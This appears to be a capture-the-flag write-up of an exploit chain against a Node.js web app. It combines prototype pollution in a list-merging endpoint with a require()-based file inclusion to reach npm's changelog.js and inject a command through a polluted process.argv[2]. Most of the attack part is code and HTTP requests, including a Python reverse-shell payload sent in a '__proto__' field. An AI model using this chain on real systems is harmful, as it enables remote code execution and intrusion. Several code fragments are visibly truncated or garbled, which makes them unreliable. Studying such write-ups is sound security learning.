There is a prototype pollution vulnerability in /api/tet/list when merging the request data:'/api/tet/list', function (req, res, next) {
    try {
        const getList1 = require("./static/list-2010-2016.js")
        const getList2 = require("./static/list-2017-2022.js")
        let newList = merge(getList1.all(), getList2.all())
        let data = || "";
        newList = merge(newList, data);
    } catch (error) {

Furthermore, user input being passed to require() leads to a LFI vulnerability.'/api/tet/years', function (req, res, next) {
    try {
        const list = req.body.list.toString();
        const getList = require("./static/" + list)
    } catch (error) {

If we could find a valid .js file that uses an attribute that we are able to pollute to spawn a new process or execute a command, then we could escalate this to an RCE.

In the Docker container, the most likely place where we could find a suitable candidate would be in the node_modules folder, containing the source code of the installed modules.

Doing a simple search for the child_process string, we could find some interesting scripts:

$ cd /usr/local/lib/node_modules
$ grep -r "child_process" .


./npm/scripts/changelog.js:const execSync = require('child_process').execSync
./npm/scripts/update-dist-tags.js:const { execSync } = require('child_process')

The changelog.js script indeed has an execSync call with a possible command injection.

'use strict'

node scripts/changelog.js [comittish]

Generates changelog entries in our format as best as its able based on
commits starting at comittish, or if that's not passed, latest.

Ordinarily this is run via the gen-changelog shell script, which appends
the result to the changelog.

const execSync = require('child_process').execSync
const branch = process.argv[2] || 'origin/latest'
const log = execSync(`git log --reverse --pretty='format:%h %H%d %s (%aN)%n%b%n---%n' ${branch}...`).toString().split(/\n/)

Since the require() call would not pass in any arguments, process.argv[2] is undefined. Therefore, we can pollute process.argv[2] with a command injection payload before importing the changelog.js file.

Testing this locally:

let a = {}

const isObject = obj => obj && obj.constructor && obj.constructor === Object;
const merge = (dest, src) => {
    for (var attr in src) {
        if (isObject(dest[attr]) && isObject(src[attr])) {
            merge(dest[attr], src[attr]);
        } else {
            dest[attr] = src[attr];
    return dest

b = { 
    ['__proto__']: { 
        '2': "; python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",13984));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")';"

merge(a, b);

To perform this exploit chain on web server, we first perform the prototype pollution:

POST /api/tet/list HTTP/1.1


Content-Type: application/json

    "data": {
        "__proto__": {
            "2":"; python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",13984));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")';"

Then, we exploit the LFI vulnerability to execute the changelog.js script.

POST /api/tet/years HTTP/1.1


Content-Type: application/json
Content-Length: 81


This should grant us our reverse shell.

$ cd /
$ ./readflag

Last updated